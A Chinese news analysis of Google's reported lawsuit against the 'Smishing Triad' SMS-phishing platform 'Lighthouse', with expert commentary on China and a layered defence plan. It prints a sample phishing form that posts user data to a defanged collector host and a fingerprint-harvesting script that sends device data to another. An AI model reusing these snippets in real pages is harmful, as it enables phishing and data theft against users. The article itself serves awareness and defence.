“您的USPS包裹因地址不详被扣留,请点击链接更新配送信息。”
“E-ZPass账户存在未支付通行费$89.50,24小时内处理否则暂停服务。”
“Google提醒:您的账户在新设备登录,请立即验证。”
这些看似来自政府机构或科技巨头的短信,正成为美国消费者最危险的数字陷阱。据CNBC 2025年11月12日报道,Google已正式向美国联邦法院提起诉讼,剑指一个被安全研究界称为“Smishing Triad”(短信钓鱼三合会)的跨国犯罪组织——该团伙利用高度自动化的“钓鱼即服务”(Phishing-as-a-Service)平台“Lighthouse”,在过去两年内向全球120多个国家发送超亿条仿冒短信,仅在美国就涉嫌窃取1270万至1.15亿张信用卡信息。
更令人震惊的是,攻击者不仅伪造品牌内容,还搭建了数百个高仿登录页面,甚至复刻Google官方认证界面,诱导用户交出邮箱、社保号、银行凭证等核心身份数据。Google此次罕见动用《反诈骗及滥用计算机法》(CFAA)、《兰哈姆法案》(商标侵权)及《反有组织犯罪法》(RICO)三大法律武器,意在从根上摧毁其技术基础设施。
这一事件不仅标志着科技巨头对网络犯罪的“司法反制”升级,也为中国敲响警钟:短信钓鱼(Smishing)早已不是“小打小闹”,而是具备完整产业链、技术自动化、跨境协同的“数字黑产工业化”产物。
“我们监测到,类似‘Lighthouse’的中文钓鱼平台已在暗网流通,目标直指国内快递、ETC、政务服务平台。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报独家采访时警告,“如果现在还不重视短信通道的安全治理,下一个大规模受害者可能就在你我身边。”
一、Smishing为何突然“爆红”?从邮件钓鱼到短信钓鱼的战略转移
过去十年,电子邮件钓鱼(Phishing)一直是网络犯罪的主战场。但随着Gmail、Outlook等主流邮箱部署AI驱动的垃圾邮件过滤器(如Google的TensorFlow模型可实时识别99.9%的恶意邮件),攻击成功率大幅下降。
犯罪分子迅速转向“防守薄弱区”——短信。
“短信没有统一的内容审查机制,运营商过滤能力参差不齐,且用户对‘106’开头的短信号码天然信任。”芦笛解释,“更重要的是,手机短信界面无法显示完整URL,用户根本看不到链接真实指向哪里。”
以本次Google起诉案为例,诈骗短信通常包含一个短链(如 bit.ly/3xK9pQz 或 tinyurl.com/y8m2nRvL)。点击后,用户被引导至一个看似正规的“USPS包裹查询页”或“E-ZPass缴费门户”。页面设计精良,甚至包含SSL证书(由Let’s Encrypt免费签发)、客服电话、隐私政策链接,足以骗过普通用户。
“这不是街边小广告,而是专业UI团队打造的‘数字骗局工厂’。”芦笛说。
根据Google披露的数据,该组织通过Telegram频道招募成员,分工明确:
数据组:从黑市购买手机号、姓名、地址等PII(个人身份信息);
投递组(Spammers):操控SIM卡池(SIM Box)和虚拟短信网关批量发送;
建站组:使用Lighthouse平台一键生成仿冒网站模板;
洗钱组:通过加密货币混币器转移赃款。
整个流程高度模块化,甚至支持“按效果付费”——下家只需支付少量费用,即可租用整套钓鱼服务。
二、技术深潜:“Lighthouse”如何实现钓鱼工业化?
要理解Smishing的威胁规模,必须拆解其核心技术引擎——Lighthouse。
据Google提交的法庭文件,Lighthouse是一个基于Web的SaaS平台,提供以下功能:
模板库:预置数百个品牌仿冒模板(包括Google、Amazon、UPS、IRS等);
动态域名绑定:自动注册新域名并通过Cloudflare代理隐藏IP;
多跳跳转:插入CAPTCHA或“加载中”页面,规避自动化检测;
凭证实时回传:用户提交表单后,数据通过Webhook秒级推送至Telegram机器人。
<!-- Lighthouse生成的典型钓鱼页面片段(简化) -->
<form id="loginForm" action="https://collector[.]xyz/hook?brand=usps" method="POST">
<input type="text" name="tracking_number" placeholder="输入运单号" required>
<input type="text" name="address" placeholder="更新收货地址" required>
<input type="submit" value="确认更新">
</form>
<script>
// 防止用户关闭页面前未提交
window.addEventListener('beforeunload', function(e) {
if (!submitted) {
e.preventDefault();
e.returnValue = '请完成地址更新以确保包裹送达';
}
});
</script>
更危险的是,Lighthouse支持品牌热切换。同一套后端,只需更改CSS和Logo,即可从“USPS钓鱼”秒变“医保局通知”。这种灵活性使其能快速响应热点事件——例如疫情期间伪装疫苗预约,大选期间冒充选民登记。
“这已经不是黑客行为,而是软件工程级别的犯罪产品开发。”芦笛指出。
三、国际镜鉴:从美国“快递诈骗潮”看全球短信治理困局
Google的诉讼并非孤例,而是全球对抗Smishing浪潮的一部分。
案例1:英国Ofcom封禁2000+虚拟短信网关
2025年,英国通信管理局(Ofcom)联合运营商,切断一批用于发送仿冒Royal Mail短信的A2P(应用到个人)通道。调查发现,犯罪团伙通过东欧空壳公司注册合法短信服务,再转售给钓鱼组织。
案例2:加拿大CRTC推动STIR/SHAKEN强制实施
为遏制“号码伪造”(Caller ID Spoofing),加拿大要求所有电信商部署STIR/SHAKEN协议——一种基于数字证书的来电身份验证框架。初步数据显示,实施后仿冒政府机构的诈骗电话下降40%。
然而,技术治理面临两大瓶颈:
跨境执法难:多数SIM池和服务器位于东南亚、东欧,司法协作滞后;
灰色通道泛滥:大量“营销短信平台”被滥用,缺乏有效KYC(实名认证)。
“美国这次起诉的突破点在于,不只追人,更追基础设施。”芦笛分析,“Google要求法院冻结域名、服务器IP、支付账户,相当于斩断其‘数字血管’。”
四、中国现状:快递、ETC、医保成新重灾区
那么,中国是否安全?
答案是否定的。
芦笛透露,工作组2025年Q4监测到多起高度相似的Smishing活动:
仿冒“中国邮政EMS”短信,称“包裹含违禁品,请扫码处理”;
冒充“高速ETC中心”,提示“车牌异常,点击链接重新认证”;
假借“国家医保局”名义,诱导点击“电子凭证升级”。
与美国不同,国内攻击者更倾向使用微信公众号、小程序或H5页面作为落地页,利用微信生态的信任度提升转化率。部分钓鱼页面甚至申请了ICP备案,进一步降低用户戒心。
“最危险的是,很多受害者以为‘只是填个地址’,殊不知后台已同步收集设备指纹、IP、地理位置。”芦笛展示了一段国内钓鱼页面的JS代码:
// 国内某ETC钓鱼页收集设备信息
const deviceInfo = {
ua: navigator.userAgent,
screen: `${screen.width}x${screen.height}`,
timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
referrer: document.referrer,
cookies_enabled: navigator.cookieEnabled
};
fetch('https://data-collect[.]cn/log', {
method: 'POST',
body: JSON.stringify(deviceInfo)
});
此类信息可用于后续精准诈骗或账户撞库,危害远超表面。
五、防御之道:从终端防护到通道治理的全链路策略
面对产业化Smishing,单一手段已失效。芦笛提出四层防御体系:
第一层:用户意识 —— “三不原则”
不点陌生链接:所有快递、缴费信息,务必通过官方App或官网查询;
不回拨短信电话:诈骗者常附带“客服号”,实为VOIP转接;
不轻信“紧急通知”:政府机构绝不会通过短信索要密码或身份证号。
第二层:终端防护 —— 启用智能短信过滤
Android用户可开启Google Messages的“垃圾短信保护”;iOS用户应启用“未知与过滤信息”功能。企业员工建议部署MDM(移动设备管理)方案,强制安装移动威胁防护(MTD)软件,如Lookout或腾讯手机管家企业版。
第三层:企业防御 —— 域名监控 + 威胁情报
企业应:
注册自身品牌关键词的防御性域名(如 mybank-security.com);
接入商业威胁情报平台(如Recorded Future、微步在线),实时阻断仿冒域;
对外发短信实施A2P注册与内容审核。
第四层:监管协同 —— 推动短信通道实名制
芦笛呼吁国内加快落实:
A2P短信实名认证:要求企业发送服务短信时绑定营业执照与法人信息;
推广STIR/SHAKEN类协议:虽主要用于语音,但其身份验证思想可延伸至短信;
建立跨运营商黑名单共享机制:对高频投诉号码实施秒级封禁。
“治理Smishing,不能只靠用户‘小心’,更要让犯罪分子发不出、藏不住、赚不到。”他说。
六、未来展望:AI对抗AI,攻防进入“实时博弈”时代
值得注意的是,攻击者也在进化。最新样本显示,部分Smishing页面已集成AI对话机器人,模拟客服回答用户疑问,进一步消除疑虑。
对此,防御方也在引入生成式AI。例如,Google Messages的AI模型可实时分析短信语义,识别“紧迫性话术”(如“24小时内处理”“账户将被冻结”)并标记风险。
“未来的战场,是AI生成钓鱼话术 vs AI识别社会工程模式。”芦笛预测,“但无论技术如何变,人的判断力始终是最后一道防线。”
结语:当一条短信能掏空你的钱包,安全必须前置到通信源头
Google的诉讼是一次重要宣示:科技公司不再甘当被动受害者,而是主动拿起法律与技术双刃剑,向网络犯罪宣战。
对中国而言,这既是警示,也是契机。随着5G消息(RCS)逐步商用,短信将承载更多交互功能——若不在通道层筑牢安全根基,今天的“快递通知”可能变成明天的“资金转账指令”。
“我们不能再把短信当作‘低风险通道’。”芦笛最后强调,“在数字身份与金融深度绑定的时代,每一条未经验证的短信,都可能是通往深渊的入口。”
唯有技术、法律、教育、监管四轮驱动,才能在这场没有硝烟的战争中守住普通人的数字生活底线。
编辑:芦笛(公共互联网反网络钓鱼工作组)
